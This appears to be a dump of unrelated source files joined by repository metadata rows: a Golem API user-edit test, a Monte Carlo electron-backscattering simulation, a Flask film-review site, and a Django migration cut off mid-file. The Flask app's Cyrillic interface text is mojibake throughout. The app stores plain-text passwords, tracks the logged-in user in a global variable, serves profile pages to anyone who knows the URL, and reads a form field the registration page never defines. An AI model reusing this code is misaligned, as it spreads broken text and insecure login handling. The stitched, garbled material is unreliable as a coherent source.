column_names=['ZoneName','Description','ManagementDomain','CreatedOn','CreatedBy','NumberofWLANs','NumberofAPs','NumberofClients','TunnelType']
table='ZoneDetails';
sparams={}
big_table(tablename=table,where_condition= '1=1',limit=10,page=1,columns=column_names,search=sparams);
#test();
|
[
"root@Karthic-Jayaraman.local"
] |
root@Karthic-Jayaraman.local
|
5cd707b6becf1983598806138c1b602763026b7a
|
1f5f8f95530003c6c66419519d78cb52d21f65c0
|
/projects/golem_api/tests/users/edit_user.py
|
8ede3ba2a8db79addec2b7d17f38ee7b733cf6f1
|
[] |
no_license
|
golemhq/golem-tests
|
c5d3ab04b1ea3755d8b812229feb60f513d039ac
|
dff8fd3a606c3d1ef8667aece6fddef8ac441230
|
refs/heads/master
| 2023-08-17T23:05:26.286718
| 2021-10-04T20:34:17
| 2021-10-04T20:34:17
| 105,579,436
| 4
| 1
| null | 2018-11-19T00:14:24
| 2017-10-02T20:05:55
|
Python
|
UTF-8
|
Python
| false
| false
| 3,058
|
py
|
from golem import actions
from projects.golem_api.pages import users
def test_edit_user(data):
username = actions.random_str()
users.create_new_user(username, '123456', 'test@test.com')
new_username = actions.random_str()
new_email = 'test2@test.com'
new_project_permissions = [{'project': "projectname", 'permission': "admin"}]
response = users.edit_user(username, new_username, new_email, False, new_project_permissions)
assert response.status_code == 200
response = users.get_user(new_username)
assert response.json()['username'] == new_username
assert response.json()['email'] == new_email
assert response.json()['is_superuser'] is False
assert response.json()['projects'] == {'projectname': 'admin'}
def test_edit_user_convert_to_superuser(data):
username = actions.random_str()
users.create_new_user(username, '123456', 'test@test.com')
response = users.get_user(username)
assert response.json()['is_superuser'] is False
users.edit_user(username, new_is_superuser=True)
response = users.get_user(username)
assert response.json()['is_superuser'] is True
def test_edit_user_invalid_email(data):
username = actions.random_str()
users.create_new_user(username, '123456', 'test@test.com')
invalid_email = 'test@test'
response = users.edit_user(username, new_email=invalid_email)
assert response.status_code == 200
assert response.json() == ['{} is not a valid email address'.format(invalid_email)]
def test_edit_user_existing_username(data):
username1 = actions.random_str()
username2 = actions.random_str()
users.create_new_user(username1, '123456')
users.create_new_user(username2, '123456')
response = users.edit_user(username1, new_username=username2)
assert response.status_code == 200
assert response.json() == ['Username {} already exists'.format(username2)]
def test_edit_user_blank_username(data):
username = actions.random_str()
users.create_new_user(username, '123456', 'test@test.com')
response = users.edit_user(username, new_username='')
assert response.status_code == 200
assert response.json() == ['Username cannot be blank']
def test_edit_user_doesnt_exist(data):
username = actions.random_str()
response = users.edit_user(username, new_username=actions.random_str())
assert response.status_code == 200
assert response.json() == ['Username {} does not exist'.format(username)]
def test(data):
username = actions.random_str()
users.create_new_user(username, '123456', 'test@test.com')
new_username = actions.random_str()
users.edit_user(username, new_username=new_username)
response = users.get_user(new_username)
assert response.json()['username'] == new_username
assert response.json()['email'] == 'test@test.com'
users.edit_user(new_username, new_email='test2@test.com')
response = users.get_user(new_username)
assert response.json()['username'] == new_username
assert response.json()['email'] == 'test2@test.com'
|
[
"luciano@lucianorenzi.com"
] |
luciano@lucianorenzi.com
|
7c71bbfd294ea8ed674139bbcfef86adb6f6d038
|
9ab9ffedb95cfe38de6a6472b57e8b87a0d6c147
|
/python/montecarlomodeling-joy1995/joy1995_chap03.py
|
f8a13fd04e24b346105e8ffab779acc8c5f5e4a7
|
[] |
no_license
|
drix00/MonteCarloModeling-Joy1995
|
e67ba3d202e2145652007aba16b32bdda661e1a4
|
12ab34caace423ef11b7ec4850ab7cb3c3d734f1
|
refs/heads/master
| 2020-07-07T20:42:44.540172
| 2019-03-14T01:57:55
| 2019-03-14T01:57:55
| 203,472,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,350
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 23 18:11:49 2015
@author: hdemers
"""
import logging
import math
import random
import csv
import matplotlib.pyplot as plt
two_pi = 2.0*math.pi
# Cutoff energy in keV in bulk case
e_min = 0.5
def single_scatter(inc_energy, at_num, at_wht, density, traj_num, thickness=None, debug=False):
"""
A single scattering Monte Carlo simulation which uses the screened Rutherford cross section.
"""
mn_ion_pot = compute_mean_ionization_potential(at_num)
if thickness is None:
thick = estimate_range(inc_energy, density)
thin = False
else:
thick = thickness
thin = True
al_a, er, lam_a, sg_a = get_constants(at_num, inc_energy, at_wht, density)
if debug:
random.seed(-1)
else:
random.seed(random.randint(-1000000, 1000000))
# The Monte Carlo loop.
bk_sct, num = zero_counters()
while num < traj_num:
s_en, x, y, z, cx, cy, cz = reset_coordinates(inc_energy)
# Allow initial entrance of electron.
step = -lambda_mfp(s_en, al_a, sg_a, lam_a) * math.log(random.random())
zn = step
if zn > thick:
num = straight_through(num)
continue
else:
y = 0.0
z = zn
# Start the single scattering loop.
while s_en > e_min:
step = -lambda_mfp(s_en, al_a, sg_a, lam_a) * math.log(random.random())
cp, sp, ga = s_scatter(s_en, al_a)
xn, yn, zn, ca, cb, cc = new_coord(step, cp, sp, ga, x, y, z, cx, cy, cz)
if zn <= 0.0:
num, bk_sct = back_scatter(num, bk_sct)
break
elif zn > thick:
num, yn = transmit_electron(num, thick, y, z, cb, cc)
break
else:
cx = ca
cy = cb
cz = cc
x = xn
y = yn
z = zn
s_en = reset_next_step(step, s_en, density, mn_ion_pot, at_num, at_wht)
else:
num = num + 1
show_traj_num(num, traj_num, debug)
# End of the Monte Carlo loop.
bse_coefficient, bse_coefficient_error = show_BS_coeff(bk_sct, traj_num, debug)
return bse_coefficient, bse_coefficient_error
def compute_mean_ionization_potential(at_num):
"""
Calculate J the mean ionization potential mn_ion_pot using the Berger-Selzer analytical fit.
"""
mm_ion_pot = (9.76 * at_num + (58.5 / math.pow(at_num, 0.19)))*0.001
return mm_ion_pot
def estimate_range(inc_energy, density):
"""
Estimate the beam range.
"""
thick = 700.0 * math.pow(inc_energy, 1.66) / density
if thick < 1000.0:
thick = 1000.0
return thick
def stop_pwr(energy, mn_ion_pot, at_num, at_wht):
"""
This computes the stopping power in keV/g/cm2 using the modified Bethe experssion of Eq. (3.21).
"""
# Just in case
if energy < 0.05:
logging.warning("energy %f < 0.05", energy)
energy = 0.05
factor = math.log(1.166*(energy + 0.85*mn_ion_pot) / mn_ion_pot)
stop_power = factor * 78500.0 * at_num / (at_wht * energy)
return stop_power
def lambda_mfp(energy, al_a, sg_a, lam_a):
"""
Compute elastic MGP for single scattering model.
"""
al = al_a / energy
ak = al * (1.0 + al)
# Giving the sg scross section in cm2 as
sg = sg_a / (energy * energy * ak)
# and lambda in angstroms is
lambda_mfp_A = lam_a/sg
return lambda_mfp_A
def get_constants(at_num, inc_energy, at_wht, density):
"""
Computes some constants needed by the program.
"""
al_a = math.pow(at_num, 0.67)*3.43e-3
# Relativistically correct the beam energy for up to 500 keV.
er = (inc_energy + 511.0) / (inc_energy + 1022.0)
er = er * er
# lambda in cm.
lam_a = at_wht / (density*6.0e23)
# Put into angstroms
lam_a = lam_a * 1.0e8
sg_a = at_num * at_num * 12.56 * 5.21e-21*er
return al_a, er, lam_a, sg_a
def reset_coordinates(inc_energy):
"""
Reset coordinates at start of each trajectory.
"""
s_en = inc_energy
x = 0.0
y = 0.0
z = 0.0
cx = 0.0
cy = 0.0
cz = 1.0
return s_en, x, y, z, cx, cy, cz
def zero_counters():
bk_sct = 0
num = 0
return bk_sct, num
def s_scatter(energy, al_a):
"""
Calculates scattering angle using screened Rutherford cross section.
"""
al = al_a / energy
R1 = random.random()
cp = 1.0 - ((2.0 * al *R1) / (1.0 + al - R1))
sp = math.sqrt(1.0 - cp*cp)
# And get the azimuthal scattering angle.
ga = two_pi * random.random()
return cp, sp, ga
def new_coord(step, cp, sp, ga, x, y, z, cx, cy, cz):
"""
Get xn, yn, zn from x, y, z and scattering angles.
"""
# Find the transformation angles.
if cz == 0:
cz = 0.000001
an_m = (-cx / cz)
an_n = 1.0 / math.sqrt(1.0 + (an_m * an_m))
# Save computation time by getting all the trancendentals first.
v1 = an_n * sp
v2 = an_m * an_n * sp
v3 = math.cos(ga)
v4 = math.sin(ga)
# Find the new direction cosines.
ca = (cx * cp) + (v1 * v3) + (cy * v2 * v4)
cb = (cy * cp) + (v4 * (cz * v1 - cx * v2))
cc = (cz * cp) + (v2 * v3) - (cy * v1 * v4)
# and get the new coordinates.
xn = x + step * ca
yn = y + step * cb
zn = z + step * cc
return xn, yn, zn, ca, cb, cc
def straight_through(num):
"""
Handles caes where initial entry exceeds thickness.
"""
num = num + 1
return num
def back_scatter(num, bk_sct):
"""
Handles case of backscattered electrons.
"""
num = num + 1
bk_sct = bk_sct + 1
return num, bk_sct
def transmit_electron(num, thick, y, z, cb, cc):
"""
Handles case of transmitted electron.
"""
num = num + 1
# Length of path from z to bottom face.
ll = (thick - z) / cc
# hence the exit y-coordinate
yn = y + ll * cb
return num, yn
def reset_next_step(step, s_en, density, mn_ion_pot, at_num, at_wht):
"""
Resets variables for next trajectory step.
"""
# Find the energy loss on thos step.
del_E = step * stop_pwr(s_en, mn_ion_pot, at_num, at_wht) * density * 1.0e-8
# So the current energy is.
s_en = s_en - del_E
return s_en
def show_traj_num(num, traj_num, debug):
"""
Updates thermometer display for % of trajectories done.
"""
percent_done = num / float(traj_num) * 100.0
if debug and percent_done % 5 ==0:
print("%3i %%" % percent_done)
def show_BS_coeff(bk_sct, traj_num, debug):
"""
Displays BS coefficient on thermometer scale.
"""
bse_coefficient = bk_sct / float(traj_num)
bse_coefficient_error = math.sqrt(bse_coefficient / traj_num * (1.0 - bse_coefficient))
if debug:
print("BSE: %f +- %f" % (bse_coefficient, 3.0*bse_coefficient_error))
return bse_coefficient, bse_coefficient_error
def run_carbon():
inc_energy = 10.0
at_num = 6
at_wht = 12.011
density = 2.62
bse_book = 0.0625724721707
traj_num = 100000
bse_coefficient, bse_coefficient_error = single_scatter(inc_energy, at_num, at_wht, density, traj_num, debug=True)
print("Z = %3i" % at_num)
print("BSE book = %f" % bse_book)
print("BSE MC = %f +- %f" % (bse_coefficient, 3.0*bse_coefficient_error))
print("Diff BSE = %f" % abs(bse_book - bse_coefficient))
def run_gold():
at_num = 79
at_wht = 196.97
density = 19.3
traj_num = 100000
for energy_keV in [1, 2, 3, 4, 5, 10, 20]:
bse_coefficient, bse_coefficient_error = single_scatter(energy_keV, at_num, at_wht, density, traj_num, debug=False)
print("%3i %.4f" % (energy_keV, bse_coefficient))
def run_figure_6_1():
print("Start figure 6.1 simulation")
inc_energy = 10.0
traj_num = 10000
elements = []
elements.append((6, 12.011, 2.62, 0.0625724721707))
elements.append((13, 26.98, 2.7, 0.148075863868))
elements.append((14, 28.09, 2.33, 0.170487882653))
elements.append((26, 55.85, 7.86, 0.275218141234))
elements.append((29, 63.55, 8.96, 0.29910424397))
elements.append((47, 107.87, 10.5, 0.421003159787))
elements.append((79, 196.97, 19.3, 0.520543686224))
bse_results = []
for element in elements:
at_num, at_wht, density, bse_book = element
bse_coefficient, bse_coefficient_error = single_scatter(inc_energy, at_num, at_wht, density, traj_num)
print("Z = %3i" % at_num)
print("BSE book = %f" % bse_book)
print("BSE MC = %f +- %f" % (bse_coefficient, 3.0*bse_coefficient_error))
print("Diff BSE = %f" % abs(bse_book - bse_coefficient))
bse_results.append(bse_coefficient)
line = ""
for bse in bse_results:
line += "%f " % (bse)
print(line)
def run_figure_6_5():
print("Start figure 6.5 simulation")
traj_num = 100000
elements = []
elements.append((6, 12.011, 2.62, 0.0625724721707))
elements.append((13, 26.98, 2.7, 0.148075863868))
elements.append((14, 28.09, 2.33, 0.170487882653))
elements.append((26, 55.85, 7.86, 0.275218141234))
elements.append((29, 63.55, 8.96, 0.29910424397))
elements.append((47, 107.87, 10.5, 0.421003159787))
elements.append((79, 196.97, 19.3, 0.520543686224))
with open("figure_6.5_100ke.csv", 'w', newline='\n') as bse_results_file:
bse_writer = csv.writer(bse_results_file)
row = ["energy (kV)"]
for element in elements:
row.append(element[0])
bse_writer.writerow(row)
for energy_keV in [1, 2, 3, 4, 5, 10, 20, 30, 40, 50, 60]:
row = [energy_keV]
for element in elements:
at_num, at_wht, density, bse_book = element
bse_coefficient, bse_coefficient_error = single_scatter(energy_keV, at_num, at_wht, density, traj_num)
print("%3i %2i %.4f %.4f" % (energy_keV, at_num, bse_coefficient, bse_coefficient_error))
row.append(bse_coefficient)
bse_writer.writerow(row)
bse_results_file.flush()
if __name__ == "__main__":
logging.getLogger().setLevel(logging.INFO)
#run_carbon()
#run_gold()
#run_figure_6_1()
run_figure_6_5()
plt.show()
|
[
"12611589+drix00@users.noreply.github.com"
] |
12611589+drix00@users.noreply.github.com
|
d259e0fd9233ecc539f5355b80ffdc63ed8e26d9
|
76260a60681ddc3e9aae5af9195188ff53973576
|
/project.py
|
4d3470418430d8eeb9be2d8c0e03d6634ad5bafb
|
[] |
no_license
|
Fedyok/Yandex-Lyceum-project-3
|
34d534bcc53a3e80a4e5c4f7923c0ee9439d4070
|
f77a69502cc12972314777aa38f8ab092c2274ac
|
refs/heads/master
| 2020-05-03T16:25:33.485839
| 2019-03-31T20:59:39
| 2019-03-31T20:59:39
| 178,715,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,052
|
py
|
from flask import Flask
from flask import *
import bd
import sqlite3
from flask import render_template
app = Flask(__name__)
HOST = '127.0.0.1'
PORT = 8080
mybd = sqlite3.connect('users.db', check_same_thread=False)
user = bd.UserModel(mybd)
user.init_table()
table_films = bd.FilmModel(mybd)
table_films.init_table()
table_comm = bd.CommentModel(mybd)
table_comm.init_table()
nic = ''
@app.route('/form_sample', methods=['POST', 'GET'])
def form_sample():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะ ะตะณะธัััะฐัะธั</title>
</head>
<body>
<h1>ะั ะฝะต ะทะฐัะตะณะธัััะธัะพะฒะฐะฝั ะฒ ัะธััะตะผะต ะะธะฝะพะัะธั!</h1>
<form method="post">
<div class="form-group">
<div class="form-group col-md-5">
<label for="inputEmail4">Email</label>
<input type="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="ะะฒะตะดะธัะต ะฐะดัะตั ะฟะพััั" name="email">
</div>
<div class="form-group col-md-5">
<label for="inputPassword4">Password</label>
<input type="password" class="form-control" id="password" placeholder="ะะฒะตะดะธัะต ะฟะฐัะพะปั" name="password">
</div>
</div>
<div class="form-group col-md-5">
<label for="nic">Nic</label>
<input type="text" class="form-control" id="nic" aria-describedby="emailHelp" placeholder="ะะฒะตะดะธัะต ะะฐั ะฝะธะบ" name="nic">
</div>
<div class="form-group">
<div class="form-group col-md-5">
<label for="about">ะะตะผะฝะพะณะพ ะพ ัะตะฑะต</label>
<textarea class="form-control" id="about" rows="3" name="about"></textarea>
</div>
<div class="form-group col-md-4">
<label for="classSelect">ะะพะทัะฐัั</label>
<select id="classSelect" class="form-control">
<option selected>ะะตะฝััะต 14</option>
<option>14</option>
<option>15</option>
<option>16</option>
<option>17</option>
<option>18</option>
<option>ะะพะปััะต 18</option>
</select>
</div>
</div>
<div class="form-group col-md-5">
<label for="form-check">ะฃะบะฐะถะธัะต ะฟะพะป</label>
<div class="form-check">
<input class="form-check-input" type="radio" name="sex" id="male" value="male" checked>
<label class="form-check-label" for="male">
ะัะถัะบะพะน
</label>
</div>
<div class="form-check">
<input class="form-check-input" type="radio" name="sex" id="female" value="female">
<label class="form-check-label" for="female">
ะะตะฝัะบะธะน
</label>
</div>
</div>
<button type="submit" class="btn btn-outline-success col-md-2">ะ ะตะณะธัััะฐัะธั</button>
</form>
</form>
</body>
</html>'''
elif request.method == 'POST':
global nic
nic = request.form['nic']
user.insert(request.form['nic'], request.form['password'],
request.form['class'], request.form['email'], request.form['sex'])
return redirect('/profile/' + request.form['nic'])
@app.route('/auth', methods=['POST', 'GET'])
def auth():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะั
ะพะด</title>
</head>
<body>
<h1>ะั
ะพะด ะฒ ัะธััะตะผั ะะธะฝะพะัะธั</h1>
<form method="post">
<input type="text" class="form-control col-md-5" id="nic" placeholder="ะะฒะตะดะธัะต ะฝะธะบ" name="nic">
<input type="text" class="form-control col-md-5" id="passwd" placeholder="ะะฒะตะดะธัะต ะฟะฐัะพะปั" name="passwd">
<button type="submit" class="btn btn-success" name = "Rgt" value = "a" >ะะพะนัะธ</button>
<button type="submit" class="btn btn-info" name = "Rgt" value = "b" >ะะฐัะตะณะธัััะธัะพะฒะฐัััั</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
global nic
nic = request.form['nic']
button = request.form["Rgt"]
if button == "a":
if user.exists(request.form['nic'], request.form['passwd'])[0] is True:
return redirect('/profile/' + request.form['nic'])
else:
return redirect('/form_sample')
else:
return redirect('/form_sample')
@app.route('/error', methods=['POST', 'GET'])
def error():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะัะธะฑะบะฐ ะพัะทัะฒะฐ</title>
</head>
<body>
<h1>ะะทะฒะธะฝะธัะต, ะฝะพ ะฒั ัะถะต ะพัะฟัะฐะฒะปัะปะธ ะพัะทัะฒ ะฝะฐ ััะพั ัะธะปัะผ.</h1>
<form method="post">
<button type="submit" class="btn btn-warning">ะ ะฟัะพัะธะปั</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
return redirect('/profile/' + nic)
@app.route('/error2', methods=['POST', 'GET'])
def error2():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะะตั ะพัะทัะฒะพะฒ</title>
</head>
<body>
<h1>ะะทะฒะธะฝะธัะต, ะฝะพ ะฝะฐ ััะพั ัะธะปัะผ ะฝะตั ะพัะทัะฒะพะฒ.</h1>
<form method="post">
<button type="submit" class="btn btn-warning">ะะฐะทะฐะด</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
return redirect('/comments')
@app.route('/error3', methods=['POST', 'GET'])
def error3():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะคะธะปัะผ ัะถะต ะตััั</title>
</head>
<body>
<h1>ะะทะฒะธะฝะธัะต, ะฝะพ ััะพั ัะธะปัะผ ัะถะต ะดะพะฑะฐะฒะปะตะฝ.</h1>
<form method="post">
<button type="submit" class="btn btn-warning">ะะฐะทะฐะด</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
return redirect('/comments')
@app.route('/error4', methods=['POST', 'GET'])
def error4():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะขะฐะบะพะณะพ ัะธะปัะผะฐ ะฝะตั</title>
</head>
<body>
<h1>ะะทะฒะธะฝะธัะต, ะฝะพ ััะพั ัะธะปัะผ ะฝะต ะดะพะฑะฐะฒะปะตะฝ. ะะพะฑะฐะฒััะต ะตะณะพ ะฟะพะถะฐะปัะนััะฐ!</h1>
<form method="post">
<button type="submit" class="btn btn-warning">ะะฐะทะฐะด</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
return redirect('/addfilms')
@app.route('/error5', methods=['POST', 'GET'])
def error5():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
<title>ะขะฐะบะพะณะพ ัะธะปัะผะฐ ะฝะตั</title>
</head>
<body>
<h1>ะะทะฒะธะฝะธัะต, ะฝะพ ะฟะพะบะฐ ัะธะปัะผะพะฒ ั ัะฐะบะธะผ ะณะพะดะพะผ ะฒัะฟััะบะฐ ะฝะต ะดะพะฑะฐะฒะปะตะฝะพ.</h1>
<form method="post">
<button type="submit" class="btn btn-warning">ะะฐะทะฐะด</button>
</form>
</body>
</html>'''
elif request.method == 'POST':
return redirect('/seefilms')
@app.route('/profile/<username>', methods=['POST', 'GET'])
def profile(username):
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
</head>
<body>
<h1>ะะพะฑัะพ ะฟะพะถะฐะปะพะฒะฐัั ะฝะฐ ะะธะฝะพะัะธั, {}</h1>
<form method="post">
<button type="submit" class="btn btn-success" name = "Rate" value = "a" >ะะพะฑะฐะฒะธัั ัะธะปัะผ</button>
<button type="submit" class="btn btn-info" name = "Rate" value = "b" >ะัะพัะธัะฐัั ะพัะทัะฒั</button>
<button type="submit" class="btn btn-danger" name = "Rate" value = "c" >ะะฐะฟะธัะฐัั ะพัะทัะฒ</button>
<button type="submit" class="btn btn-warning" name = "Rate" value = "d" >ะะธะฑะปะธะพัะตะบะฐ ัะธะปัะผะพะฒ</button>
</form>
</body>
</html>'''.format(username)
elif request.method == 'POST':
button = request.form["Rate"]
if button == "a":
return redirect('/addfilms')
elif button == "b":
return redirect('/comments')
elif button == "c":
return redirect('/addcom')
elif button == "d":
return redirect('/seefilms')
@app.route('/addfilms', methods=['POST', 'GET'])
def films():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
</head>
<body>
<h1>ะะพะฑะฐะฒััะต ัะธะปัะผ</h1>
<form method="post">
<div class="form-row">
<input type="text" class="form-control col-md-5" id="nf" placeholder="ะะฒะตะดะธัะต ะฝะฐะทะฒะฐะฝะธะต ัะธะปัะผะฐ" name="nf">
<input type="text" class="form-control col-md-5" id="genre" placeholder="ะะฒะตะดะธัะต ะถะฐะฝั ัะธะปัะผะฐ" name="genre">
</div>
<div class="form-group">
<label for="about">ะ ัะธะปัะผะต(ะบัะฐัะบะพะต ะพะฟะธัะฐะฝะธะต)</label>
<textarea class="form-control col-md-5" id="about" rows="2" name="about"></textarea>
</div>
<div class="form-group">
<input type="number" class="form-control col-md-5" id="yearf" placeholder="ะะฒะตะดะธัะต ะณะพะด" name="yearf">
</div>
<button type="submit" class="btn btn-success" name = "Add" value = "a" >ะะพะฑะฐะฒะธัั ัะธะปัะผ</button>
<button type="submit" class="btn btn-danger" name = "Add" value = "b" >ะัะผะตะฝะฐ</button>
<form>
</body>
</html>'''
elif request.method == 'POST':
button = request.form["Add"]
if button == "a":
if table_films.exists(request.form['nf'], request.form['yearf'])[0] is True:
return redirect('/error3')
else:
table_films.insert(
request.form['nf'], request.form['genre'], request.form['about'], request.form['yearf'])
return redirect('/profile/' + nic)
else:
return redirect('/profile/' + nic)
@app.route('/addcom', methods=['POST', 'GET'])
def addcom():
if request.method == 'GET':
return '''<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous">
</head>
<body>
<h1>ะัะตะฝะธัะต ัะธะปัะผ ัะฐะผะธ!!!</h1>
<form method="post">
<div class="form-row">
<input type="text" class="form-control col-md-5" id="nf" placeholder="ะะฒะตะดะธัะต ะฝะฐะทะฒะฐะฝะธะต ัะธะปัะผะฐ" name="nf">
<input type="number" class="form-control col-md-5" id="yearf" placeholder="ะะฒะตะดะธัะต ะณะพะด" name="yearf">
</div>
<div class="form-group col-md-5">
<label for="about"> </label>
<label for="about">ะะฝะตะฝะธะต ะพ ัะธะปัะผะต</label>
<textarea class="form-control" id="about" rows="3" name="about"></textarea>
</div>
<div class="form-group col-md-5">
<label for="classSelect">ะ ะตะนัะธะฝะณ</label>
<select class="form-control" id="classSelect" name="class">
<option>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
</select>
</div>
<button type="submit" class="btn btn-success" name = "Add" value = "a" >ะัะฟัะฐะฒะธัั ะพัะทัะฒ</button>
<button type="submit" class="btn btn-danger" name = "Add" value = "b" >ะัะผะตะฝะฐ</button>
<form>
</body>
</html>'''
elif request.method == 'POST':
button = request.form["Add"]
if button == "a":
iduser = user.get_id(nic)[0]
if table_films.exists(request.form['nf'], request.form['yearf'])[0] is True:
idfilm = table_films.get_id(request.form['nf'])[0]
else:
return redirect('/error4')
print(iduser, idfilm)
if table_comm.exists(idfilm, iduser )[0] is True:
return redirect('/error')
else:
table_comm.insert(
idfilm, iduser, request.form['about'], request.form['class'])
return redirect('/profile/' + nic)
else:
return redirect('/profile/' + nic)
@app.route('/comments', methods=['POST', 'GET'])
def comments():
try:
mas1=[]
global rate
rate = 0
if table_films.exists(request.form['nf'], request.form['yearf'])[0] is True:
idfilm = table_films.get_id(request.form['nf'])[0]
mas1 = table_comm.get(idfilm)
mas2 = list(table_comm.getRate(idfilm))
print(mas2)
sum = 0
for i in range(len(mas2)):
sum += mas2[i][0]
rate = sum / len(mas2)
mas_films = []
for i in range(len(mas1)):
mas_films.append({})
mas_films[i]['nic'] = user.get(mas1[i][0])[0]
mas_films[i]['description'] = mas1[i][1]
for j in mas_films:
if j['nic'] == '':
j['nic'] = 'unknown user'
else:
pass
if request.form["Go"] == "b":
return redirect('/profile/'+nic)
if bool(mas_films) is False:
return redirect('/error2')
except Exception as e:
print(e)
mas_films = [ # ัะฟะธัะพะบ ะฒัะดัะผะฐะฝะฝัั
ะฟะพััะพะฒ
{
}
]
print(mas_films)
return render_template('odd_even.html', rate = rate, films=mas_films)
@app.route('/seefilms', methods=['POST', 'GET'])
def seefilms():
try:
mas1=[]
if request.form["yearf"] != "":
mas1 = table_films.get_year(request.form["yearf"])
else:
mas1 = table_films.get_all()
if request.form["Go"] == "b":
return redirect('/profile/'+nic)
if bool(mas1) is False:
return redirect('/error5')
except Exception as e:
print(e)
return render_template('odd_even2.html', films=mas1)
if __name__ == '__main__':
app.run(port=PORT, host=HOST)
|
[
"noreply@github.com"
] |
noreply@github.com
|
af8b45eb284b3530ad3e6119002d939b6b2c6eed
|
d87243c4f3bdd058115846b267964a8b513457a5
|
/shortstories/migrations/0001_initial.py
|
cda48a52ee47a215154c75720299e5dfa2e06f0f
|
[
"MIT"
] |
permissive
|
evenset/ketabdan-project
|
33678b1afafe3cd0f969f624e4aabac10fae718b
|
ea56ad18f64b35714c6c3a0d85e59a3f8514057a
|
refs/heads/develop
| 2021-07-26T16:29:24.011024
| 2018-09-24T23:20:10
| 2018-09-24T23:20:10
| 125,778,476
| 4
| 0
|
MIT
| 2018-09-28T04:00:46
| 2018-03-18T23:49:39
|
Python
|
UTF-8
|
Python
| false
| false
| 946
|
py
|
# Generated by Django 2.0.3 on 2018-07-13 01:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
